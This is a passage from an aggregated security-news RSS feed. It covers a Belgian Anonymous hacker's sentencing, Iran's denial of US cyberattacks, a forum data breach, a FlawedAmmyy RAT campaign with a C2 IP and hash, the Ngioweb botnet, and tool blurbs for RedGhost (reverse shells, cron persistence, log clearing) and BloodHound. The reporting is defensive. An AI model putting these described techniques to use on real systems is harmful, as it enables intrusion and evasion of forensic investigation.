According to the prosecutors, the man is an active member of Anonymous Belgium and Cyber Crew hacking groups, he was involved in numerous operations of the collectives of hackers, including one aimed at FIFA, the international soccer/football federation.

Brecht also blackmailed some organizations threatening them of DDoS attacks, in one case the victim was a restaurant. The hacker shut down the website of the restaurants several times with DDoS attacks and asked for a ransom payment to halt the attacks.

The police also identified a co-conspirator, a 44-year-old man from Bruges. The hacker was also a member of a cyber criminal gang and had exchanged hacking tools with Brecht.

Brecht S. was already sentenced to three years in prison for throwing the molotov cocktail, along with the other defendant he was also fined for 1,200 euro. 

“A 35-year-old man from Roeselare has been sentenced to eighteen months in prison because he hacked the website of Crelan and took it offline for hours.” reported the Belgian news site Het Laatste Nieuws. “Crelan received three thousand euros in compensation. The defendant also extorted a pizzeria by laying down the website and asking for ransom. Another hacker from Bruges was fined 1,200 euros.”

HLN reported that Brecht received an 18 months prison sentence for cybercrimes he committed and was ordered to pay €3,000 to Crelan Bank as compensation for damages caused by the DDoS attacks.

Brecht’s co-conspirator has not been sentenced to prison.

Pierluigi Paganini

(SecurityAffairs – Anonymous, hacktivism)

The post Anonymous Belgium hacker identified after dropping USB drive while throwing Molotov cocktail appeared first on Security Affairs.

New Mac Malware Exploits GateKeeper Bypass Bug that Apple Left Unpatched

Cybersecurity researchers from Intego are warning about possible active exploitation of an unpatched security vulnerability in Apple's macOS Gatekeeper security feature details and PoC for which were publicly disclosed late last month. Intego team last week discovered four samples of new macOS malware on VirusTotal that leverage the GateKeeper bypass vulnerability to execute untrusted code on

Iran denies attack against its infrastructure has ever succeeded

After media reported a cyber offensive launched by the US against Iran, Teheran announced that alleged cyber attack against its infrastructure has ever succeeded.

Last week, media reported that the United States has launched a series of cyber attacks on Iran after the Iranian military has downed an American surveillance drone.

US President Donald Trump first approved military strikes against Iran in retaliation for downing a surveillance drone, but pulled back from launching them on Thursday night after a day of escalating tensions.

The tensions between Iran and the US is increasing after President Trump blamed Iran for the attacks on the oil tankers traveling through the Strait of Hormuz. Iran has immediately denied that accusation. Trump decided to temporary suspend the attacks to attempt negotiation and urge new sanctions against Iran, but at the same time, he secretly authorized US Cyber Command to carry out a retaliatory cyber attack on Iran.

US hit IRAN

Now Teheran replied to the news reported by the media and revealed that cyber attack against its infrastructure has ever succeeded.

“The media are asking about the veracity of the alleged cyber attack against Iran. No successful attack has been carried out by them, although they are making a lot of effort,” ICT Minister of Iran Mohammad Javad Azari Jahromi said on Twitter.

The Iranian telecommunications minister labeled the activity against its state as “cyber terrorism — such as Stuxnet — and unilateralism — such as sanctions”.

"The media are asking about the veracity of the alleged cyber attack against Iran. No successful attack has been carried out by them…" – telecommunications minister Mohammad Javad Azari Jahromi. https://t.co/fzEEap8OfR

— Al Jazeera News (@AJENews) June 24, 2019

US media on Saturday said Washington launched cyber attacks against Iranian missile control systems and a spy network this week after Tehran downed an American surveillance drone.

“President Trump approved an offensive cyberstrike that disabled Iranian computer systems used to control rocket and missile launches, even as he backed away from a conventional military attack in response to its downing Thursday of an unmanned U.S. surveillance drone, according to people familiar with the matter.”reported The Washington Post.

“The cyberstrikes, launched Thursday night by personnel with U.S. Cyber Command, were in the works for weeks if not months, according to two of these people, who said the Pentagon proposed launching them after Iran’s alleged attacks on two oil tankers in the Gulf of Oman earlier this month.”

The cyber attacks carried out by the US Cyber Command aimed at destroying computers systems that control rocket and missile launches.

According to Yahoo, two former intelligence officials confirmed that cyber attacks also hit spying group responsible for tracking ships in the strategic Strait of Hormuz.

This isn’t the first time that the US opted out for a cyber attack to hit Iran, the Stuxnet virus first uncovered in 2010, was used to shut down nuclear facilities in Iran at least since 2005.

Since the Stuxnet attack, Iran-linked APT groups have increased their cyber capabilities and have intensified their activities against entities worldwide.

“We foiled last year not one attack but 33 million attacks with Dejpha shield,” declared Azari Jahromi referring to a cyber defence system.

Pierluigi Paganini

(SecurityAffairs – Iran, hacking)

The post Iran denies attack against its infrastructure has ever succeeded appeared first on Security Affairs.

SocialEngineered forum hacked and data leaked online

SocialEngineered.net is a forum dedicated to social engineering discussions, it has been compromised data of its users was leaked on a hacker forum.

SocialEngineered.net, the forum dedicated to social engineering topics, announced it has suffered a data breach two weeks ago.

Hackers accessed data from tens of thousands of members and leaked them online on a hacker forum.

The hackers exploited a vulnerability in the MyBB forum to access forum data.

“Mybb had a vulnerability yet again and the site got breached along other websites using Mybb . We moved over to xenforo i suggest changing your passwords immideately.” said owner of SocialEngineered.net forum.

Owner of the SocialEngineered forum decided to move to the XenForo forum platform after the incident. The administrator urges members of changing their login passwords.

In June, experts at RIPS Tech discovered security flaws (a stored cross-site scripting (XSS) and file write issue) in MyBB prior to version 1.8.21 that could allow attackers to take over any board hosted by sending a malicious private message to an administrator or by creating a malicious post.

MyBB has already released a patched version, but evidently, administrators are slow in updating their websites.

On June 13, the attacker leaked data on a hacker forum claiming that he had “uploaded the full database and root directory of this website.”

SocialEngineered forum leak post

The dump includes data of 55,121 forum users, compromised info includes usernames, passwords stored as salted MD5 hashes, email addresses, IP addresses, and private messages.

A post published on a rival forum also revealed that the dump includes the source code of the website, along with data and logs.

The HaveIBeenPwned websites added the leaked data to its system, data set includes 89,000 unique email addresses from 55,000 forum users.

“In June 2019, the “Art of Human Hacking” site Social Engineered suffered a data breach. The breach of the XenForo forum was published on a rival hacking forum and included 89k unique email addresses spread across 55k forum users and other tables in the database. The exposed data also included usernames, IP addresses, private messages and passwords stored as salted MD5 hashes.” states HaveIBeenPwned.

Breach date: 13 June 2019
Date added to HIBP: 23 June 2019
Compromised accounts: 89,392
Compromised data: Email addresses, IP addresses, Passwords, Private messages, Usernames”

Pierluigi Paganini

(SecurityAffairs – SocialEngineered forum, hacking)

The post SocialEngineered forum hacked and data leaked online appeared first on Security Affairs.

Microsoft warns of attacks delivering FlawedAmmyy RAT directly in memory

Researchers at Microsoft uncovered a malicious campaign that delivers the infamous FlawedAmmyy RAT directly in memory.

Experts at Microsoft uncovered a malicious campaign that delivers the FlawedAmmyy RAT directly in memory.

The FlawedAMMYY backdoor borrows the code of the Ammyy Admin remote access Trojan, it allows attackers to get full access to a victim’s machine. FlawedAmmyy RAT allows stealing sensitive data from infected systems and exfiltrating files.

FlawedAmmyy Remote Access Trojan was involved in attacks carried out by the threat actors tracked as TA505.

Microsoft observed weaponized spam messages using .xls attachments with content in Korean. The macro included in the documents executes the legitimate msiexec.exe tool that downloads an MSI archive.

The MSI archive includes a digitally signed executable that decrypts and execute another executable in memory once it is opened.

Anomaly detection helped us uncover a new campaign that employs a complex infection chain to download and run the notorious FlawedAmmyy RAT directly in memory. The attack starts with an email and .xls attachment with content in the Korean language. pic.twitter.com/PQ2g7rvDQm

— Microsoft Security Intelligence (@MsftSecIntel) June 21, 2019

This executable then downloads and decrypts another file, wsus.exe, which was also digitally signed on June 19. wsus.exe decrypts and runs the final payload directly in memory. The final payload is the remote access Trojan FlawedAmmyy.

— Microsoft Security Intelligence (@MsftSecIntel) June 21, 2019

“This executable then downloads and decrypts another file, wsus.exe, which was also digitally signed on June 19. wsus.exe decrypts and runs the final payload directly in memory. The final payload is the remote access Trojan FlawedAmmyy,” reads a Tweet published by Microsoft Security Intelligence.

One of the samples involved in this campaign, detected on June 22, was digitally signed using a certificate issued by Thawte for Dream Body Limited.

2019-06-22: 📺#FlawedAmmyy #RAT 👾🐀 | #Signed
Digital Cert 🔏-> [Dream Body Limited] #Thawte
C2: 169.239.128. 185
h/t @malwrhunterteam
🔦Recompiled AmmyAdmin v3🤔
Seems every day they leverage new malware signing 📈certs for campaigns in🇰🇷
MD5: fb5a09e073324e99b979831a98b120b0 pic.twitter.com/oYT96blamA

— Vitali Kremez (@VK_Intel) June 22, 2019
FlawedAmmyy RAT

In May, experts at Yoroi-Cybaze Z-Lab observed a spike in the number of attacks against the banking sector and spotted a new email stealer used by the TA505 hacker group.

Earlier June, researchers at Trend Micro observed the TA505 group carrying out attacks, involving the FlawedAmmyy RAT and other RATs, against users in Latin America and Asia.

Pierluigi Paganini

(SecurityAffairs – FlawedAmmyy, malware)

The post Microsoft warns of attacks delivering FlawedAmmyy RAT directly in memory appeared first on Security Affairs.

Before yesterdayYour RSS feeds

RedGhost - Linux Post Exploitation Framework Designed To Gain Persistence And Reconnaissance And Leave No Trace

By: Zion3R

Linux post exploitation framework designed to assist red teams in gaining persistence, reconnaissance and leaving no trace.
  • Payloads Function to generate various encoded reverse shells in netcat, bash, python, php, ruby, perl
  • Crontab Function to create cron job that downloads and runs payload every minute for persistence
  • Clearlogs Function to clear logs and make investigation with forensics difficult
  • MassInfoGrab Function to grab mass information on system
  • BanIp Function to BanIp


BloodHound – Hacking Active Directory Trust Relationships

By: Darknet
BloodHound – Hacking Active Directory Trust Relationships

BloodHound is for hacking active directory trust relationships and it uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment.

Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use it to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment.

Read the rest of BloodHound – Hacking Active Directory Trust Relationships now! Only available at Darknet.

Free proxy service runs on top of Linux Ngioweb Botnet

Researchers from Netlab, discovered a website offering free and commercial proxy servers leveraging a huge botnet (Ngioweb) of hacked WordPress sites.

Researchers from Netlab, discovered that Free-Socks.in proxy service is leveraging a huge botnet of hacked WordPress sites.

According to the experts, traffic managed by the proxy service is routed through a network of hacked WordPress sites.

Threat actors compromised the WordPress sites with highly obscured web shells and the Linux.Ngioweb malware that implements the proxy agent.

The variant analyzed by the researchers is a Linux porting of the Win32.Ngioweb malware that was first detected in the wild in August 2018 by experts at Check Point.

“We determined that this is a Proxy Botnet, and it is a Linux version variant of the Win32.Ngioweb malware. We named it Linux.Ngioweb. It shares a lot of code with Win32.Ngioweb, except that it has DGA features.” reads the analysis of Netlab.

“In addition, we have observed that Linux.Ngioweb malware has been implanted into a large number of WordPress Web servers.”

The experts registered one of the DGA C2 domain names (enutofishpronadimofulmultihitision[.]org) in order to analyze the traffic generated by the bot.

The Linux.Ngioweb Bot sample implements Back-Connect Proxy on the victim’s machine.

“The attacker builds multiple Bots into a Proxies Pool and controls it through a two-tier C2 protocol, then provides a Rotating Proxy Service.” continues the analysis.

Ngioweb Linux

The first stage (Stage-1) manages all the infected sites, while the second one (Stage-2) set the C&C servers. At the Stage 2, the bot establishes communication with the C2 of Stage-2 and enables the Back-Connect Proxy function. Command and Control servers of the stage-2 is specified by the CONNECT command.

Sinkholing the C2 domain experts observed connections from 2,692 WordPress compromised sites, most of which are located in the US.

Netlab plans to share the list of infected servers with other security firms and law enforcement agencies.

Relevant security and law enforcement agencies are welcomed to contact netlab[at]360.cn for a list of infected IP addresses.

“Readers are always welcomed to reach us on twitter, WeChat 360Netlab or email to netlab at 360 dot cn.” concludes the report.

Pierluigi Paganini

(SecurityAffairs – Ngioweb, hacking)

The post Free proxy service runs on top of Linux Ngioweb Botnet appeared first on Security Affairs.

Ransomware analysis with Volatility

Introduction In this article, we’ll discuss the Volatility framework and how to perform analysis on ransomware using it. We’ll discuss various capabilities of the tool that can allow us to perform forensic analysis. For this article, we’ll be analyzing two notorious forms of malware, WannaCry and Jigsaw. The malware handled in this article will be […]

The post Ransomware analysis with Volatility appeared first on Infosec Resources.


Ransomware analysis with Volatility was first posted on June 24, 2019 at 8:02 am.
©2017 "InfoSec Resources". Use of this feed is for personal non-commercial use only. If you are not reading this article in your feed reader, then the site is guilty of copyright infringement. Please contact me at darren.dalasta@infosecinstitute.com

CyberSeek Cybersecurity Career Pathway: Cybersecurity manager/admin

Introduction Cybersecurity managers are advanced-level IT professionals who have worked their way up through the ranks to take on responsibilities in leadership and management. Typically, they have boots-on-the-ground experience with security risk assessment and remediation, computer forensics, incident response and network security; with all this experience and more, they’ve reached a point in their career […]

The post CyberSeek Cybersecurity Career Pathway: Cybersecurity manager/admin appeared first on Infosec Resources.


CyberSeek Cybersecurity Career Pathway: Cybersecurity manager/admin was first posted on June 24, 2019 at 8:01 am.
©2017 "InfoSec Resources". Use of this feed is for personal non-commercial use only. If you are not reading this article in your feed reader, then the site is guilty of copyright infringement. Please contact me at darren.dalasta@infosecinstitute.com
❌